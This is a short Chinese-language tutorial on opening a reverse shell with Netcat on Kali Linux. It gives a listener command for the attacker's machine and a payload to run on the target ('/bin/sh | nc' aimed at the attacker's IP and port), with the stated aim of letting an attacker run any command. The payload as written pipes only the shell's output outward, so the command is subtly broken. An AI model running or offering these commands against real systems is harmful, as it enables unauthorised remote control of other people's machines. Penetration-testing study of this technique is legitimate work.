如何在 Kali Linux 中使用 Netcat 创建反向 Shell?
Netcat 是 Linux 中的一个命令,用于执行端口监听、端口重定向、端口检查,甚至网络测试。 Netcat 也被称为网络工具的瑞士军刀。此命令还用于创建反向 shell。在深入了解反向 shell 之前,必须先了解 netcat 工具到底是什么。要了解更多信息,您可以阅读文章 netcat 命令。
通常,为了入侵系统,攻击者会尝试获得 shell 访问权限以执行恶意负载命令。获得的shell称为反向shell,攻击者可以作为root用户使用它,攻击者可以利用它做任何事情。在整个过程中,攻击者的机器充当等待传入连接的服务器,并且该连接带有一个 shell。
创建反向壳
1. 设置一个监听器:第一步是在攻击者的机器上设置一个监听器,以充当服务器并监听传入的连接。使用以下命令开始监听。
nc –nlvp 5555
将端口号 5555 替换为要接收连接的端口。
这将在端口 5555 上启动侦听器。
2.从目标接收连接和shell :现在我们已经开始监听了,是时候在目标上执行一个基本的payload,这样我们就可以获得一个反向shell。使用以下命令向攻击者发送请求。
/bin/sh | nc 127.0.0.1 5555
将 127.0.0.1 替换为攻击者的主机 IP,将 5555 替换为攻击者的端口。
这将为攻击者提供一个反向 shell,攻击者可以使用它来执行任何命令。
3.通过shell执行命令:现在如果我们在接收者的终端输入任何命令,输出将显示在攻击者的终端上。